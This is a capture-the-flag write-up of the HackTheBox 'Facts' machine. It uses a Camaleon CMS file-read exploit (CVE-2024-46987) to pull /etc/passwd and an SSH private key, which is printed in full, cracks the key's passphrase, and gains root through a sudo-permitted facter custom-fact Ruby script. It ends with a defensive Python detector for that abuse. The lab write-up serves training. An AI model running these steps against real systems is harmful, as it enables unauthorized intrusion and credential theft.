HTB-Facts

Nmap

Nmap port scan

┌──(kali👻Thr2on1)-[~/Websec/HTB/Facts]
└─$ sudo nmap -p- --min-rate 10000 10.129.35.87 -oA nmapscans/ports
Nmap scan report for facts.htb (10.129.35.87)
Host is up (0.16s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
54321/tcp open unknown

Ports 22, 80 and 54321 are open.

CVE-2024-46987

Visiting the web page, the CSS/JS asset path /assets/themes/camaleon_first/ shows that the site is built on Camaleon CMS.

Visiting the admin directory, it is possible to register an account and log in. A Google search shows that the Camaleon CMS backend has an arbitrary file read vulnerability (CVE-2024-46987); the exploit script was downloaded from GitHub: https://github.com/Goultarde/CVE-2024-46987.

Use the registered account to read files:

┌──(kali👻Thr2on1)-[~/Websec/HTB/Facts/CVE-2024-46987]
└─$ python3 CVE-2024-46987.py -u http://facts.htb/ -l 123 -p 123 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
usbmux:x:100:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:102:102::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:992:992:systemd Resolver:/:/usr/sbin/nologin
pollinate:x:103:1::/var/cache/pollinate:/bin/false
polkitd:x:991:991:User for polkitd:/:/usr/sbin/nologin
syslog:x:104:104::/nonexistent:/usr/sbin/nologin
uuidd:x:105:105::/run/uuidd:/usr/sbin/nologin
tcpdump:x:106:107::/nonexistent:/usr/sbin/nologin
tss:x:107:108:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:108:109::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
trivia:x:1000:1000:facts.htb:/home/trivia:/bin/bash
william:x:1001:1001::/home/william:/bin/bash
_laurel:x:101:988::/var/log/laurel:/bin/false

Two users have a login shell:

trivia:x:1000:1000:facts.htb:/home/trivia:/bin/bash
william:x:1001:1001::/home/william:/bin/bash

Read user.txt:

┌──(kali👻Thr2on1)-[~/Websec/HTB/Facts/CVE-2024-46987]
└─$ python3 CVE-2024-46987.py -u http://facts.htb/ -l 123 -p 123 /home/william/user.txt
6ef5c0d422fc224e982adbed988d1d44

Foothold

Next, the SSH keys: trying to read id_rsa returned nothing. Following a hint from an AI, I read the authorized_keys file instead.

┌──(kali👻Thr2on1)-[~/Websec/HTB/Facts/CVE-2024-46987]
└─$ python3 CVE-2024-46987.py -u http://facts.htb/ -l 123 -p 123 /home/trivia/.ssh/authorized_keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJZbWGFe1ScRexbSkkCg7IBVrlxhzJKCC433yUP75zSe

This shows the key type is ed25519, so the private key can be read as id_ed25519:

┌──(kali👻Thr2on1)-[~/Websec/HTB/Facts/CVE-2024-46987]
└─$ python3 CVE-2024-46987.py -u http://facts.htb/ -l 123 -p 123 /home/trivia/.ssh/id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABBponzeuN
I0RdixIiDl7OfQAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIJZbWGFe1ScRexbS
kkCg7IBVrlxhzJKCC433yUP75zSeAAAAoA2DmipF8Ybf8uWSGxCGTIcNZxH0sznfDeLdKY
DF7gkgE1h7qv2V4hF3Oll5ke0tct2peCZTIPJC28lJK57knHmbaXy+v30T6RWzE+xiK7U+
d/CmZ4tQKCjLpquSinfxckgpeOPjeQSd8AQHCUqU0xV8ddtFCxJzSnrEO29izgDIOjexn0
66JLUXKgCTwL9mfM5pZIn6ssoPZWg+9Om1Tk4=
-----END OPENSSH PRIVATE KEY-----

Save it locally, then connect to the server over SSH.

┌──(kali👻Thr2on1)-[~/Websec/HTB/Facts/CVE-2024-46987]
└─$ ssh trivia@10.129.3.9 -i id_ed25519
Enter passphrase for key 'id_ed25519':

The private key turns out to be passphrase-protected, so crack the passphrase with john:

┌──(kali👻Thr2on1)-[~/Websec/HTB/Facts/CVE-2024-46987]
└─$ ssh2john id_ed25519 > ssh_hash

┌──(kali👻Thr2on1)-[~/Websec/HTB/Facts/CVE-2024-46987]
└─$ john ssh_hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 24 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dragonballz (id_ed25519)
1g 0:00:00:52 DONE (2026-02-14 00:08) 0.01920g/s 61.44p/s 61.44c/s 61.44C/s billy1..imissu
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Then try logging in again, entering the recovered passphrase:

trivia@facts:~$ id
uid=1000(trivia) gid=1000(trivia) groups=1000(trivia)

ROOT

Check for possible privilege-escalation paths:

trivia@facts:~$ sudo -l
Matching Defaults entries for trivia on facts:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User trivia may run the following commands on facts:
(ALL) NOPASSWD: /usr/bin/facter

trivia can run /usr/bin/facter as root without a password. facter is the Puppet tool that collects system facts.

Its --custom-dir option points facter at a directory of custom fact scripts, which it loads and executes in order to collect custom facts. Since sudo runs facter as root, any Ruby placed in that directory runs as root as well.

Create a malicious Ruby script:

echo 'exec("/bin/bash")' > root.rb

Run the facter command:

trivia@facts:~$ sudo facter --custom-dir .
root@facts:/home/trivia# id
uid=0(root) gid=0(root) groups=0(root)
root@facts:/home/trivia# cat /root/root.txt
bc3d9b8d771cd78fdcc1591c7219ec33
root@facts:/home/trivia#
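A defender-side counterpart to the escalation above, added here and not part of the original writeup: a small detector that scans sudo's syslog lines for facter being run as another user with a fact directory outside the expected Puppet locations, resolving relative directories such as "." against the caller's PWD. The sample log lines and the trusted-directory list are constructed assumptions of this example; the --external-dir flag, which facter also accepts, is covered alongside the --custom-dir flag from the page.

```python
import os
import re

# Default sudo syslog shape: "sudo: <user> : TTY=.. ; PWD=.. ; USER=.. ; COMMAND=.."
SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : TTY=\S+ ; PWD=(?P<pwd>\S+) ; "
                     r"USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$")
# Where fact directories are expected to live (assumption; adjust to your layout).
TRUSTED_FACT_DIRS = ("/etc/facter/", "/etc/puppetlabs/facter/", "/opt/puppetlabs/")
# facter options that make it load code or data from a caller-chosen directory.
LOADER_FLAGS = ("--custom-dir", "--external-dir")

# Constructed sample lines (not from the original post); the first mirrors the
# "sudo facter --custom-dir ." step above, the second is a legitimate Puppet run.
SAMPLE_LOG = """\
Feb 14 00:09:41 facts sudo:   trivia : TTY=pts/0 ; PWD=/home/trivia ; USER=root ; COMMAND=/usr/bin/facter --custom-dir .
Feb 14 00:09:50 facts sudo:   puppet : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/facter --custom-dir /etc/facter/custom os
Feb 14 00:10:02 facts sudo:   trivia : TTY=pts/0 ; PWD=/home/trivia ; USER=root ; COMMAND=/usr/bin/facter kernel
Feb 14 00:10:15 facts sudo:   william : TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/facter --external-dir=/tmp/facts
"""

def untrusted_fact_dir(cmd, pwd):
    """Resolved fact directory if facter loads from outside TRUSTED_FACT_DIRS, else None."""
    argv = cmd.split()
    if not argv or os.path.basename(argv[0]) != "facter":
        return None
    for i, arg in enumerate(argv):
        flag, _, value = arg.partition("=")  # handles --flag=DIR and --flag DIR
        if flag not in LOADER_FLAGS:
            continue
        if not value and i + 1 < len(argv):
            value = argv[i + 1]
        if not value:
            continue
        # A relative directory such as "." resolves against the caller's PWD.
        path = os.path.normpath(os.path.join(pwd, value))
        if not (path + "/").startswith(TRUSTED_FACT_DIRS):
            return path
    return None

def scan_sudo_log(lines):
    """One finding per sudo line that runs facter with an untrusted fact directory."""
    findings = []
    for line in lines:
        m = SUDO_RE.search(line)
        if not m:
            continue
        path = untrusted_fact_dir(m.group("cmd"), m.group("pwd"))
        if path is not None:
            findings.append({"user": m.group("user"), "runas": m.group("runas"), "path": path})
    return findings
```

Running scan_sudo_log over SAMPLE_LOG.splitlines() flags the trivia and william invocations and leaves the Puppet run alone; the same sudo rule is easier to fix at the source by not granting NOPASSWD on a binary that loads code from a user-chosen directory.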